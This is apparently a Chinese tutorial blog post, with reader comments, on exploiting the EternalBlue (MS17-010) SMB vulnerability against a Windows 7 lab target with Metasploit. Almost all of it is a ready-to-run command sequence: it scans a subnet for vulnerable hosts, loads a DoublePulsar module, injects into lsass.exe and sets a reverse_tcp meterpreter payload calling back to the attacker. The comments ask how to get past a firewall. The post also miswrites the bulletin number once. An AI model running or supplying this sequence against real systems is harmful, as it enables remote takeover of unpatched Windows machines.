其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。
本次用到的环境:
kali系统.ip地址:192.168.1.106
目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.102
具体的步骤如下:
kali系统下安装wine32:
dpkg --add-architecture i386 && apt-get update &&apt-get install wine32
git clone下载其利用脚本
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb
cd Eternalblue-Doublepulsar-Metasploit/
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
nmap漏洞指定扫描:
nmap -n -p445 --script smb-vuln-ms17-010 192.168.0.0/24 --open
启动msf,然后进行一系列设置:
service postgresql start
msfconsole
search eternalblue
use exploit/windows/smb/eternalblue_doublepulsar
进行攻击载荷的配置工作:
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
set rhost 192.168.1.102
show targets
set target 8
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 192.168.1.106
exploit
6 comments
有没有办法在不关闭防火墙的情况下攻破受害机
防火墙一般都是已知该漏洞后,才起到防护作用。对于未知的漏洞就是摆设。所以需要自己多挖掘未知漏洞。
还有在同一目录下的Doublepulsar-1.3.3.xml也是无法读取
为什么说缺一个xml文件
提交下错误代码
无法获取'/use/share/metasploit-framework/modules/exlpoit/windows/smb/deps/Eternalblue-2.2.0.xml'的文件状态(start)